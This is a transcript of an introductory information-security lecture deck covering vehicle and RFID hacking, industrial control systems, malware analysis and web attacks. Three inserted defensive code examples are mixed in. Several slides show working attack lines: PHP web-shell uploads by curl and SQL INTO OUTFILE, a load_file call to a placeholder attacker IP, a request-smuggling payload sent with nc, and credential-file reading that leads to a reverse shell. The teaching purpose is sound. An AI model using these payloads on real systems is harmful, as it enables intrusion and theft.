NCU2020 Information Security 101

NotSurprised

August 17, 2020
Transcript

  1. > • Background
    • Penetration Test
      – Web/Host Scanning
      – Escalate / persistence
      – Phishing
      – Real-World Invading
    • Malware Analysis
      – Get Sample
      – Static Analysis
      – Dynamic Analysis
    • Tool Develop
      – Blue Team
      – Red Team
      – Real Tool
    • Extradition
    • Recon
      – Binary
      – Sitemap
      – OSINT
    • Vulnerability
      – User
      – Data
      – Host Machine
    • Combination
      – Combo Attack
      – POE
      – Post-Exploitation
  2. > NotSurprised Intro
    • UCCU Hacker
    • AIS3 2016 trainee
    • HITCON Defend 2018 3rd (etc.)
    • SITCON 2019 speaker
    • MOPCON 2019 speaker
    • LINE Becks.io#5 speaker
    • iThome CyberSec 2020 speaker
    • ITRI Engineer (serve my country)
    • 5-year Bachelor & Master of NSYSU
    Email : [email protected]
    Skill
    • Windows Kernel Driver (Minifilter)
    • Penetration Test (Web)
    • Malware Analysis (Ransomware)
    • Ethereum Smart Contract (Solidity)
    • Car Security (OMA DM)
  3. > • G-force
      – An ace pilot should tolerate 9G for 15s
      – If the pilot cannot keep blood in the head:
        • Greyout
        • Tunnel vision
        • Blackout
        • G-LOC
    • Spoofing IFF (Identification, friend or foe) affiliation to a single aircraft or AWACS
  5. > • Charlie Miller Jeep Cherokee
      – Charlie Miller shared a series of attack vectors
    • Tencent KeenLab Tesla Model S
    • ADCD Key Signal repeat
      – Proof that signals can simply be triggered and amplified to repeat received signals
    • PWN2OWN 2019 Tesla Model 3
    • Car2go Auto Review Application in Chicago
      – Because of a connect-to-server problem, the review mechanism could be defrauded and the car unlocked with a fake person ID
  6. > • RFID
    • CAN Bus
    • Bluetooth
    • Cellular Network (Internet)
    • VANET
    • OMA DM
  9. > • RFID (Radio Frequency Identification) is also radio
    • In vehicles: long distance, usually in high frequencies (UHF)
    root@kali:~# nfc-list
    nfc-list uses libnfc 1.7.1
    NFC device: pn532_uart:/dev/ttyUSB0 opened
    1 ISO14443A passive target(s) found:
    ISO/IEC 14443A (106 kbps) target:
        ATQA (SENS_RES): 00 04
        UID (NFCID1): 3c 3d f1 0d
        SAK (SEL_RES): 08
    root@kali:~# nfc-mfsetuid 3c3df10d
    NFC reader: pn532_uart:/dev/ttyUSB0 opened
    Sent bits: 26 (7 bits)
    Received bits: 04 00
    Sent bits: 93 20
    Received bits: 0c 5c ee 0d b3
    Sent bits: 93 70 0c 5c ee 0d b3 5c c2
    Generate fake RFID key
    RFID Reader with Arduino
  10. > • Signal Amplification Relay Attack
    • Originally designed to copy keys for backup and become an all-in-one RFID key for personal use
    • Can copy 125 kHz (“low frequency”) RFID
    • Cannot copy 13.56 MHz (“high frequency”) NFC
  14. > • Best way to get into the CAN bus
      – Compromise the car’s mini computer (OS: QNX, Win CE, Linux, Android, Green Hills)
      – As a component in the car, the mini computer connects to the CAN bus and the dashboard
    • Messages on the CAN bus system
      – CAN message format
        • ISO 11519-2 / ISO 11898:1993 / ISO 11898:1995
        • Put the highest-privilege code in your broadcast packet
      – Diagnostic trouble code format
        • Sometimes triggers an automatic reaction
    • Aircraft also use the CAN bus
      – Same problem: the microcontroller is the last line of defence in a simple aircraft
  16. > • CAN
      – ISO-TP (ISO 15765-4)
      – CANopen
      – GMLAN bus
    • SAE J1850
      – PWM
      – VPW
    • KWP
      – KWP2000 (ISO 9141-2)
      – ISO 14230-4
    • LIN Bus
    • MOST
      – Independent from the bus line; used for IVI, connects to the speakers and the cellular network.
    • FlexRay
    • Ethernet
  17. > • FlexRay bus
      – Fastest
      – Expensive
      – Top class cars
      – Sensitive
    • CAN bus
      – Good CP value
      – Widely used
    credit :
  18. > Expensive OBD2 Cable      | Cheap OBD2 Cable
    Normal                       | Limited
    Usually not                  | Sometimes
    GUI / Auto Link              | Open Source / Self-defined
    High                         | Low (china copycat)
    Yes                          | No
    Lots                         | None
    Yes                          | None
  19. > • MyCar, CarDoctor, Car Scanner
      – Type of product that connects to OBDII and an APP
      – Monitor your car’s status to avoid being defrauded by the repair shop
      – Usually Bluetooth (shorter distance, more secure) or WIFI/3G/4G
      – As IoT, default account/password remains a problem
      – Bluetooth default pairing key: 0000/1234 (sometimes not even requested)
  20. > • Uses UUIDs and handles (company identifier) for the primary service and characteristic commands.
    • Sometimes you can brute force it, or use OSINT for hints.
    • MiBand2 has no auth key; MiBand3 has a breakable auth key.
  21. > • ELM327 OBD2 BLE
    • Cannot change PIN
    • Supports several client APPs
    credit :
  22. > • ELM327 OBD2 WiFi
    • Default IP & Port
    • Supports several client APPs
  24. > • Not just Bluetooth: they also use GPS and a cellular connection to extend their range to anywhere with an internet connection.
    credit :
  25. > • Account & Password are factory defaults (Bootstrap) and well known
    • The User Guide containing the account/password is public on the internet
      – https://fccid.io/2AEB4AG21/User-Manual/User-manual-3104674
    credit :
  26. Vehicular Ad Hoc Network
    On-Board Unit, OBU
    • On-board device to receive/send messages
    • Combined with sensors: microcontroller, speed sensor, brake sensor, radar, GPS, etc.
    Road Side Unit, RSU
    • Road-side sensor to receive/send messages
    • Has computing abilities
    • Co-works with the OBU to make V2V communication happen
    • The RSU can connect to the central control center to keep the road state under control
    credit : yenchih.kuo@NSYSU
  27. • Communication between cars: Vehicle to Vehicle, V2V
    • Communication between car and road: Vehicle to Infrastructure, V2I
    • Dedicated Short Range Communications (DSRC)
      • 5.85 GHz ~ 5.925 GHz
      • Infrared, RFID, IEEE 802.11p, IEEE 1609
      • In IEEE 1609.x: Wireless Access in the Vehicular Environment (WAVE)
      • Transmission Rate: 3~27 Mbps
      • Max Range: 1 km
    credit : yenchih.kuo@NSYSU
  28. > • Every second a car broadcasts its own basic info, including highway ID, delivery time, position and speed.
    • An attacker can overwrite the Beacon info to make the MDS make mistakes.
    • Therefore a vehicle needs to confirm that a packet comes from a valid node and check its checksum.
    VANET attack detection can be summed up in 5 phases:
    • Abnormal Data Check
    • Alert Check
    • Node-Oriented Detecting Method
    • Data-Oriented Detecting Method
    • Privacy
  29. > • JTAG
      – A kind of debugging protocol; can download and upload the firmware; find the pins in the manual
    • JTAGulator
      – A tool that helps researchers find the JTAG pins on a chip
    credit : attify
  30. > • SWD (serial wire debug)
      – A kind of debugging protocol, supported by the STM32F4 series (STM32F4 is the most widely used car chip)
    • STM32F4 Discovery Kit
      – A debug tool provided by ST themselves
    credit : st
  31. > MobilePhone / Server     | HMI                 | MicroController
    HTTP                       | Modbus              | Canbus
    Device                     | PLC                 | ECU
    No                         | No / TLS1.2         | No
    Strong                     | Normal              | Weak
    Lots                       | Few                 | Few
    *Public                    | Private             | *Public
    *Few                       | *Few                | Lots
    Remote / Extranet          | Remote / Extranet   | Physical / Short-dist / Remote
  32. > • Most are targeted attacks
    • Vehicle security is based on closed source and inconsistency, just like OT
    • Revenue is in a totally different class from IoT devices, so it is worth a targeted attack
    • As AI rises, autonomous vehicles will definitely need standards to connect to the road system and collect info for AI, which brings security problems
  37. > • With an HTTP sniffer you get the account/password
    • The door sequence is shown in the URL query as plaintext
    • Even without an account/password, you can unlock most doors remotely via SQLi
    • There is a password to switch to setting mode in the product’s user manual, which you can find on the internet, e.g. #123456#
  39. > • A human-readable JSON protocol “encrypted” with an easily reversible autokey (-85) XOR cipher, and a binary DES-encrypted configuration (AC/PW: admin/admin)
  40. > • SCADA vs DCS
      – SCADA, Supervisory Control and Data Acquisition System: across fabs, works with DCS, PCS, ECS (network isolated?)
      – DCS, Distributed Control System: usually in the same fab, but distributed control
    • IT (information technology):
      – Layer 5 Enterprise Network:
        • firewall, WAF, IPS, IDS
      – Layer 4 Enterprise server:
        • DMZ, AD server, Patch server, Web Server
    • OT (operation technology):
      – Layer 3 Manufacturing operation & control:
        • FactoryTalk Server, Engineer Workstation
      – Layer 2 Area Supervisory control:
        • Router, switch, HMI, FactoryTalk Client
      – Layer 1 Control:
        • Batch Control, Safety Control, Driver Control, PLC
      – Layer 0 Process:
        • Sensor, Driver, Robot
  41. > Information Technology
    Level 5 Enterprise Network
    Level 4 Enterprise Servers: Email, Internet, etc.
    DMZ (between Level 4 and Level 3): Web Services, Application Servers, Historian Mirror, Firewall, Terminal Services, Patch Management
    Operational Technology
    Level 3 Site Manufacturing Operation and Control: Primary Historian, Factory Talk Application Server, Engineering Workstations
    Level 2 Area Supervisory Control: Factory Talk Client, HMI, Factory Talk Client, HMI
    Level 1 Control: Batch Control, Discrete Control, Driver Control, Continuous Process Control, Safety Control
    Level 0 Process: Actuators, Drivers, Sensors, Robots
  43. > • PLC Structure
      – CPU
      – Program Memory (程式記憶體)
      – System Memory (系統記憶體)
      – Component Memory (元件記憶體)
      – Data Memory (資料記憶體; usually the most attacked location)
    • Instances
      – 2010 Iran: Stuxnet
      – 2014 Germany: steel mill; Japan: Monju (文殊) nuclear plant
      – 2015 Ukraine: nuclear power plant
      – 2018 Taiwan: TSMC
    • CyberX Report
      – 57% of AntiVirus installations cannot update their virus hash DB
      – 53% still use WinXP
  44. > • ICS Protocols
      – At least hundreds
      – Few open resources
      – No sharing of self-defined protocols (even different types within the same company)
      – Fieldbus, wireless, RS232 serial port frequency, etc.
    • Modbus TCP
      – The Modbus structure is like TCP
      – The major part is the Function Code
      – Only a few function codes are defined in the protocol; vendors can still use alternative (self-defined) codes
      – The new version will include HTTPS
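To make the "function code is the major part" point concrete, here is an added example (not from the deck) that parses the Modbus/TCP MBAP header and PDU and classifies the function code against the public codes assigned by the Modbus Application Protocol specification, the user-defined ranges (65 to 72 and 100 to 110) that vendors' "self-defined" codes fall into, and exception responses (high bit set). A passive OT monitor can use this kind of check to alert on write requests and on non-public codes. The three frames are constructed for the example, not captured traffic, and the alert policy (alert on writes and on non-public codes) is an assumption of the example.

```python
import struct
from dataclasses import dataclass

# Public function codes assigned by the Modbus Application Protocol spec (V1.1b3).
PUBLIC_FUNCTION_CODES = {
    1: "Read Coils", 2: "Read Discrete Inputs", 3: "Read Holding Registers",
    4: "Read Input Registers", 5: "Write Single Coil", 6: "Write Single Register",
    7: "Read Exception Status", 8: "Diagnostics", 11: "Get Comm Event Counter",
    12: "Get Comm Event Log", 15: "Write Multiple Coils", 16: "Write Multiple Registers",
    17: "Report Server ID", 20: "Read File Record", 21: "Write File Record",
    22: "Mask Write Register", 23: "Read/Write Multiple Registers",
    24: "Read FIFO Queue", 43: "Encapsulated Interface Transport",
}
# Codes that change PLC state; a monitor should alert on these (assumed policy).
WRITE_CODES = {5, 6, 15, 16, 21, 22, 23}
# Ranges the spec leaves to vendors: the "self-defined" codes the slide mentions.
USER_DEFINED_RANGES = ((65, 72), (100, 110))


@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int
    function_code: int
    data: bytes


def parse_modbus_tcp(frame: bytes) -> ModbusFrame:
    """Split a Modbus/TCP frame into MBAP header fields and PDU (function code + data)."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, pid, length, uid = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError(f"protocol identifier must be 0 for Modbus, got {pid}")
    # The MBAP length counts the unit id plus the PDU, so the PDU is length - 1 bytes.
    pdu = frame[7:7 + length - 1]
    if len(pdu) != length - 1 or len(frame) != 7 + length - 1:
        raise ValueError("MBAP length field disagrees with frame size")
    return ModbusFrame(tid, uid, pdu[0], pdu[1:])


def classify_function_code(fc: int) -> str:
    if fc & 0x80:
        return "exception-response"   # server signalled an error for fc & 0x7F
    if any(lo <= fc <= hi for lo, hi in USER_DEFINED_RANGES):
        return "user-defined"         # vendor-specific, opaque without vendor docs
    if fc in PUBLIC_FUNCTION_CODES:
        return "public-write" if fc in WRITE_CODES else "public-read"
    return "reserved"                 # neither public nor user-defined


def inspect_frame(frame: bytes) -> dict:
    """Parse one frame and return the alerts a passive OT monitor would raise for it."""
    parsed = parse_modbus_tcp(frame)
    kind = classify_function_code(parsed.function_code)
    alerts = []
    if kind == "public-write":
        alerts.append(f"write request {PUBLIC_FUNCTION_CODES[parsed.function_code]} "
                      f"to unit {parsed.unit_id}")
    elif kind in ("user-defined", "reserved"):
        alerts.append(f"non-public function code 0x{parsed.function_code:02x} ({kind})")
    return {"transaction_id": parsed.transaction_id, "unit_id": parsed.unit_id,
            "function_code": parsed.function_code, "kind": kind, "alerts": alerts}


# Constructed sample frames (not captured traffic): tid | pid | len | uid | fc | data
READ_HOLDING = bytes.fromhex("0001 0000 0006 01 03 0000 0002")           # read 2 holding registers
WRITE_MULTI = bytes.fromhex("0002 0000 0009 01 10 0010 0001 02 1234")   # write 1 register at 0x10
VENDOR_CODE = bytes.fromhex("0003 0000 0004 01 66 0102")                # fc 0x66 = 102, user-defined

if __name__ == "__main__":
    for name, frame in (("read", READ_HOLDING), ("write", WRITE_MULTI), ("vendor", VENDOR_CODE)):
        print(name, inspect_frame(frame))
```

The parser is strict about the MBAP length field on purpose: a frame whose declared length disagrees with its size is exactly the kind of input a vendor stack may accept silently, so a monitor should surface it rather than guess.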
  48. > • At DEFCON27, DEVCORE Principal Researcher Orange and Researcher Meh presented SSL VPN vulnerabilities
    • They won the “Pwnie Awards” (the Oscars of Information Security)
  51. > Remote Code Execution
    • Vulnerabilities in existing services
    • No need for click bait
    • Usually needs PoE from user privilege
    Phishing
    • PICNIC (problem in chair, not in computer)
    • Needs click bait
    • Usually also gets AD privilege with the click bait (UAC)
  55. > • Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests
    • tcp port 445
    • When srvnet receives a packet it stores the pointer 0xffdff000 after byte a1, and the address 0xffdff000 holds the data sent by the client.
    • srv.sys has incorrect logic when handling SrvOs2FeaListSizeToNt, leading to an out-of-bounds copy that overwrites memory and makes shellcode executable.
    unsigned int __fastcall SrvOs2FeaListSizeToNt(int pOs2Fea)
    {
        ……
        Length = *(_DWORD *)pOs2Fea;
        ……
        *(_WORD *)pOs2Fea = pBody - pOs2Fea;
        ……
    }
    Typical Ransomware: Eternal Blue = WannaCry
  56. > Step 1. Collect virus intelligence
    • Outbreak situation, infection scope, onset behaviour, complications
    Step 2. Collect virus samples
    • Distinguish the downloader from the virus body
    • Enough analysis of entry-level samples effectively sharpens the intuition for guessing the obfuscation of advanced samples
    • Write your own sample based on disclosed data (remember not to open source it)
    Step 3. Static analysis
    • Disassemble and break down: monitoring module, persistence module, propagation module, call-back (C&C) module
    Step 4. Build the detection environment
    • Build a fake C&C server (if needed)
    • Set the activation switches (IP location, vulnerable Service)
    • Simulate the victim scenario (normal user, IoT, production-line HMI/PLC, Server)
    Step 5. Dynamic analysis
    • Attach every tool with Log/Debug enabled (syscalls, network)
    • Find a way to recover the data (BSoD, Encrypt, ForceReboot)
  58. > • IAT existed
    • API directly calling
    • No shell pack
    • No obscuration
    • Source comparable
    vs.
    • IAT destroyed
    • API magic calling
    • Heavy shell pack
    • Lots of obscuration
    • BlackBox
  60. > • Same family: data structure (collapsed, needs fixing)
    • Structure, number of items and different Developers show subtle differences that can distinguish families (often still hard to tell apart)
  61. > • Obfuscation (混淆技術):
      – Transforms program code into a functionally equivalent form that is hard to read and understand
    • Packing (加殼技術, shell packer):
      – Data compression and encryption protection for EXE files; the file unpacks itself and can hide the unpacking process
      – Some packers also add obfuscation techniques or concepts, e.g. a VM Shell that fully encrypts the ASM, leaving only the FDE
    • Already in 2006, 80%~90% of malware used packing, half of it public techniques or old packers, and the ratio is believed to be higher today. Detecting packers by Entropy, Signature or PE header all have flaws. Anti-virus software defends poorly against any newly released packer
    • Obfuscation is a basic requirement for both benign and malicious software developers; a certain degree of obfuscation reduces the risk of development techniques being decompiled, copied and stolen
  62. > • The "Save Load" trick (Save Load 大法)
      – Store the real instruction address on the Stack, then read it out when needed
    • Control-flow obfuscation (流程混淆)
      – Like taking a detour to shake off a tail: use equivalent jumps or register moves that disassemblers recognise poorly, so the disassembly cannot be read directly (e.g. call xxx = push retAddr; push xxx; ret)
    • String obfuscation (字串混淆)
      – Basic: change the encoding; advanced: generate the string by computation
    • Anti ASM-to-C (反ASM2C)
      – Use tricks that disassembly tools misinterpret so they cannot decompile smoothly to C code
    • IAT (import address table)
      – Destroying the IAT avoids the intent being spotted quickly and makes static lookup of entries harder; the program still runs because it refills the IAT at runtime from dynamically computed offsets
    • Structured Exception Handling (SEH)
      – try, exception, __finally: similar to the SL trick, it returns to the fault point and re-executes, except the Jump target is a self-built list handed to the CPU’s IDT (TIB fs:[0]); this JUMP uses no Jmp, Jl, Je or similar ASM, and the Catch Handler may be discarded as dead code by tools decompiling back to C (while the exception handling still executes)
      – Sometimes usable by the virus to detect whether a debugger is attached
  63. > • UPX
      – UPX is a free compressor operated from the command line that uses a compression algorithm called UCL. UCL’s biggest advantage is that compression and decompression need no extra memory. UPX currently has DOS, Linux and Windows versions.
    • Armadillo
      – A widely used commercial packer that can add usage-time, usage-count and splash-screen settings to a program; one of its protection features is called Nanomite.
      – The Nanomite technique marks certain program sections, obfuscates them and writes them into memory. The places where that code originally lived are replaced with jumps. Before compression the packer then turns these jumps into int 3 (opcode 0xCC) breakpoints and records the marks.
      – Import table Elimination is another technique Armadillo uses. Since an analyst can guess a program’s intent from the APIs in its import table, destroying the original import table makes decompilation harder. This technique is also very common in private packers.
    • VM Protector
      – Uses a VM Agent (FDE) similar to Java’s or Python’s to interpret every encrypted ASM (vOpCode) instruction.
  64. > Free EDR
    • SysMon
    • Wazuh
    Windows Tools
    • Process Monitor
    • Process Explorer
    • Procexp
    • Autoruns
    Network Sniffer
    • MITM Proxy
    • TCPViewer
    • Nirsoft TCPLogView (has log)
  82. > • ASM executable -> C
    • IDA pro [f15]
    Figure: Cpp source, ASM and Binary, with IDA Pro disassembling the binary back to C
  84. > Figure: VM Shell vOpcode decoder. Stack addresses 006DFA24 … 006DFA58 hold <Unknown vOpCode> entries alongside EIP and Data columns; at 006DFA44 the decoded byte c3 is a ret.
  85. > • For Web, the targets of a carpet scan, besides the near-certain 80/443, are importantly:
      – FTP - used to upload website files
      – SQL - the dynamic website’s database
      – SSH - remote login to modify the website
      – RDP - remote login to modify the website
      – SMB - used to upload website files
  97. > Feed the common words below into hashcat with Hob0Rules to generate candidate passwords
    • Name
    • Birthday
    • National ID number
    • Common mailbox
    • Employee ID
    • Company English abbreviation
    hashcat --stdout password.txt -r /usr/share/hashcat/rules/hob064.rule -o password-new.txt --force
    • reverse: -r
    • uppercase: -u
    • lowercase: -l
    • append characters: -$ITRI
    • prepend characters: -^ITRI
    • repeat twice: -p2
  111. > Figure: User, itriweb.org (www.itriweb.org/login.php) and a Hacker-owned page (www.coupon.com/index.php)
    1. User Login
    2. AC/PW
    3. Cookie
    4. Open Url
  112. > Same figure, one step further:
    5. Cookie & ChangeAccountUrl
  113. > • Put an API Token in the request form, not only a login Token.
    • Check the request’s Referer header.
    • Also set the HTTPONLY flag to prevent XSS from stealing the user’s cookie.
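The three defences on this slide, put together in an added example (not from the deck): a per-session anti-forgery token that must come back in the form body, an Origin/Referer check against the site's own origin, and the Set-Cookie attributes for the session cookie. The host name www.itriweb.org and the hacker-owned www.coupon.com come from the slides; the Origin check and the SameSite attribute are additions beyond what the slide lists, and the request and header dicts are constructed stand-ins for a real framework's request object.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# The site's own origin (host taken from the deck's example); anything else is cross-site.
TRUSTED_ORIGIN = "https://www.itriweb.org"


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Mint a per-session random token, keep it server-side and return it for the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def same_origin(header_value: Optional[str]) -> bool:
    """True if an Origin or Referer value points back at our own scheme and host."""
    if not header_value:
        return False   # missing header: fail closed for state-changing requests
    got, want = urlsplit(header_value), urlsplit(TRUSTED_ORIGIN)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def validate_state_changing_request(session: Dict[str, str], headers: Dict[str, str],
                                    form: Dict[str, str]) -> Tuple[bool, str]:
    """Apply the slide's two request-side checks to a POST that changes account state."""
    # 1. The form itself must carry the API token; compare in constant time with the session copy.
    expected, submitted = session.get("csrf_token", ""), form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False, "missing or mismatched csrf token"
    # 2. Origin (preferred, browsers set it on POST) or Referer must name our own site.
    if not same_origin(headers.get("Origin") or headers.get("Referer")):
        return False, "request did not originate from our origin"
    return True, "ok"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for the login cookie: HttpOnly hides it from script (the slide's
    XSS point); Secure and SameSite are the usual companions for a session cookie."""
    return f"SESSIONID={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    session: Dict[str, str] = {}
    token = issue_csrf_token(session)
    # Constructed requests: a genuine form post, and a cross-site post from the hacker-owned page.
    genuine = validate_state_changing_request(
        session, {"Origin": "https://www.itriweb.org"}, {"csrf_token": token, "email": "user@example.org"})
    forged = validate_state_changing_request(
        session, {"Referer": "http://www.coupon.com/index.php"}, {"email": "attacker@example.org"})
    print(genuine, forged, session_cookie_header("abc123"))
```

Note that the forged request fails on the token check before the Referer is even consulted: the Referer check is a second layer for the case where a token leaks, not the primary control, which matches the slide's ordering.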
  114. ( )

  115. > Figure: Hacker, URL Dealer (e.g. Hyperlink, Graph), Firewall (e.g. WAF, IPS, DMZ) marked X, Private Network Server (e.g. FTP, Mail Server)
  116. > Same figure without the X on the Firewall
  117. > • In the protocol design before HTTP1.0, every HTTP request a client made required establishing a TCP connection to the server. Modern web pages are composed of many kinds of resources: to fetch one page we must request the HTML document plus JS, CSS, images and so on, so under the earlier design the HTTP server’s load would rise. HTTP1.1 therefore added two features, Keep-Alive and Pipeline.
    Figure: No Pipelining vs Pipelining (Client and Server; Open, Open, Close, Close)
  118. > • Transfer-Encoding (TE)
    POST /xxx HTTP/1.1
    Host: xxx
    Content-Type: text/plain
    Transfer-Encoding: chunked

    4\r\n
    Wiki\r\n
    5\r\n
    pedia\r\n
    e\r\n
     in\r\n\r\nchunks.\r\n
    0\r\n
    \r\n
    (Header, then Body: 1st chunk, 2nd chunk, 3rd chunk, chunk close; each chunk is a Length line followed by its Content)
  119. > Figure: Keep-Alive, with and without pipelining, between Client, Middleware (e.g. CDN, Proxy) and Backend (e.g. LAMP): req A, req B, req C go through and resp A, resp B, resp C come back in order.
  120. > printf 'GET / HTTP/1.1\r\n'\
    'Host: localhost\r\n'\
    'Content-length: 58\r\n'\
    'Transfer-Encoding: chunked\r\n'\
    'Token: YYYYYY\r\n\r\n'\
    '0\r\n'\
    '\r\n'\
    'GET /API HTTP/1.1\r\n'\
    'Host: localhost\r\n'\
    'Dummy: Header\r\n'\
    '\r\n'\
    'GET /info HTTP/1.1\r\n'\
    'Host: localhost\r\n'\
    'Token: XXXXXX\r\n'\
    '\r\n'\
    | nc -q1 127.0.0.1 8787
    The same bytes, with [CRLF] marking each \r\n:
    GET / HTTP/1.1[CRLF]
    Host: localhost[CRLF]
    Content-length: 58[CRLF]
    Transfer-Encoding: chunked[CRLF]
    Token: YYYYYY[CRLF]
    [CRLF]
    0[CRLF]
    [CRLF]
    GET /API HTTP/1.1[CRLF]
    Host: localhost[CRLF]
    Dummy: Header[CRLF][CRLF]
    GET /info HTTP/1.1[CRLF]
    Host: localhost[CRLF]
    Token: XXXXXX[CRLF][CRLF]
  121. > Middleware: Content-Length first. The Header ends at the blank line after Token: YYYYYY (Transfer-Encoding is ignored or removed). The Body is 58 bytes, starting at "0[CRLF]" and ending at "Dummy: Header[CRLF][CRLF]"; what follows ("GET /info …") is not parsed as part of this request.
  122. > Backend: Transfer-Encoding first, as in RFC 7230. "0[CRLF][CRLF]" is the Chunk End, so the first request finishes there.
  123. > Same as 122: everything after the Chunk End ("GET /API …") is the sending payload; the /r/n is replaced here.
  124. > Variant of 121 with "Dummy: Headerxxxx" in place of "Dummy: Header[CRLF][CRLF]": the Middleware still takes 58 bytes of Body by Content-Length, and the rest is not parsed.
  125. > Variant of 122 with "Dummy: Headerxxxx": the Backend (Transfer-Encoding first, RFC 7230) ends the first request at the Chunk End; the payload after it now reads "GET /API … Dummy: Headerxxxx GET /info …" with the /r/n replaced here.
  126. Figure: User and Hacker, Middleware (e.g. CDN, Proxy), Backend (e.g. LAMP). The Hacker’s POST carries a Token and passes the Middleware; the Backend then sees the smuggled API Request as well, so an unauthenticated API request gets through ("Pass Unauthenticated API request").
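An added example (not from the deck) that makes the two framings of slides 120 to 125 explicit and shows the check a front end should apply. It reconstructs the slide's request as bytes, parses the header block, frames the body once by Content-Length (the middleware's reading) and once by chunked Transfer-Encoding (the backend's reading, per RFC 7230 section 3.3.3, which says Transfer-Encoding overrides Content-Length and that a message carrying both ought to be treated as an error), and reports whether the two disagree. Rejecting, or re-framing and stripping Content-Length before forwarding, is what removes the desync; the parser here is a minimal one written for the example, not any proxy's real code.

```python
from typing import Dict, List, Tuple

# The request from slide 120, reconstructed as bytes. It carries both Content-Length
# and Transfer-Encoding, which is the ambiguity the slides exploit.
RAW_REQUEST = (
    b"GET / HTTP/1.1\r\nHost: localhost\r\nContent-length: 58\r\n"
    b"Transfer-Encoding: chunked\r\nToken: YYYYYY\r\n\r\n"
    b"0\r\n\r\n"
    b"GET /API HTTP/1.1\r\nHost: localhost\r\nDummy: Header\r\n\r\n"
    b"GET /info HTTP/1.1\r\nHost: localhost\r\nToken: XXXXXX\r\n\r\n"
)


def split_head(raw: bytes) -> Tuple[str, Dict[str, List[str]], bytes]:
    """Return (request line, lower-cased header map, bytes after the header block)."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete header block")
    lines = head.split(b"\r\n")
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower().decode("latin-1"), []).append(
            value.strip().decode("latin-1"))
    return lines[0].decode("latin-1"), headers, rest


def body_by_content_length(headers: Dict[str, List[str]], rest: bytes) -> Tuple[bytes, bytes]:
    """Framing a Content-Length-first parser (the slide's Middleware) applies."""
    n = int(headers["content-length"][0])
    return rest[:n], rest[n:]


def body_by_chunked(rest: bytes) -> Tuple[bytes, bytes]:
    """Framing a Transfer-Encoding-first parser (the slide's Backend, per RFC 7230) applies."""
    body, pos = b"", 0
    while True:
        end = rest.index(b"\r\n", pos)
        size = int(rest[pos:end].split(b";")[0], 16)   # chunk size, ignoring extensions
        pos = end + 2
        if size == 0:
            end = rest.index(b"\r\n", pos)
            while end != pos:                          # skip any trailer fields
                pos = end + 2
                end = rest.index(b"\r\n", pos)
            return body, rest[end + 2:]                # bytes after the chunk end
        body += rest[pos:pos + size]
        pos += size + 2                                # skip the data and its CRLF


def first_line(data: bytes) -> str:
    return data.split(b"\r\n", 1)[0].decode("latin-1")


def check_framing(raw: bytes) -> dict:
    """Compare both framings and report whether a front end must reject the request."""
    request_line, headers, rest = split_head(raw)
    has_cl, has_te = "content-length" in headers, "transfer-encoding" in headers
    codings = [c.strip().lower() for c in ",".join(headers.get("transfer-encoding", [])).split(",") if c]
    reasons = []
    if has_cl and has_te:
        reasons.append("both Content-Length and Transfer-Encoding present (RFC 7230 3.3.3)")
    if has_cl and len(set(headers["content-length"])) > 1:
        reasons.append("conflicting Content-Length values")
    if has_te and (not codings or codings[-1] != "chunked"):
        reasons.append("Transfer-Encoding does not end with chunked")
    result = {"request_line": request_line, "ambiguous": bool(reasons), "reasons": reasons}
    if has_cl:
        body, left = body_by_content_length(headers, rest)
        result["cl_framing"] = {"body_len": len(body), "next_request_line": first_line(left)}
    if codings and codings[-1] == "chunked":
        body, left = body_by_chunked(rest)
        result["te_framing"] = {"body_len": len(body), "next_request_line": first_line(left)}
    return result


if __name__ == "__main__":
    print(check_framing(RAW_REQUEST))
```

On the slide's request the two framings disagree on where the next request starts (GET /info under Content-Length, GET /API under chunked), which is why the Token check done by the middleware does not cover what the backend executes.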
  134. > • curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://192.168.227.134/test/shell.php
  140. > Read File (/etc/passwd, /.ssh/id_rsa) -> Brute-Force Passwords with Accounts / Use key to SSH -> Upload Script -> Try to make a reverse shell
    e.g. ssh [email protected] -i id_rsa
  141. > Read File / SQLi (/var/www/web/connect.config) -> Sell Data / DataBase
    e.g.
    SELECT "<? echo passthru($_GET['cmd']); ?>" INTO OUTFILE '/var/www/shell.php'
    SELECT load_file('\\\\YOUR.IP.GOES.HERE\\shell.php');
    SELECT sys_exec('usermod -a -G admin UserA');
    Try to make a reverse shell
    DoS e.g. SELECT * From TableA, TableB, TableC, TableD, TableE, TableF; $$
  142. > Figure: Self-XSS + CSRF against baike.baidu.com; User, baike.baidu.com/login.php and a Hacker-owned page (www.coupon.com/index.php)
    1. User Login
    2. AC/PW
    3. Cookie
    4. Open Url
    5. Cookie & Edit Self-XSS and Trigger
    6. Retrieve Baidu bduss (core cookie)
  143. > • Wordpress CVE-2019-6977: Arbitrary WriteFile + Local File Including
    1. Login to admin panel
    2. Crafted Image: through Dir, write file [_wp_attached_file] & [Edit] into the Theme Folder
    3. Template Include [_wp_page_template] -> Return Shell
  145. > • June 2017: Ransomware attack on Maersk
    • June 2018: NotPetya attack on Saint-Gobain
    • March 2019: LockerGoga attack on Norsk Hydro
    • May 2019: RobinHood attack on Baltimore City
  147. > • No internal network segmentation
    • Important hosts have no internal protection, so lateral movement is easy
    • No RDP gateways configured
    • Services that can execute programs remotely (WRM, WMIC, PSEXEC, RDP) have no control over who logs in, their groups or their permissions
    • No restriction on the domain range allowed to log in remotely to the services above (WRM, WMIC, PSEXEC, RDP)
    • No GPO set to shorten the session timeouts of the services with remote-execution capability above
    • Login control on important hosts is not paired with Multi-factor Authentication, such as a SmartCard or a computed Token
    • For convenience, a single user holds Local Administrator rights on many machines
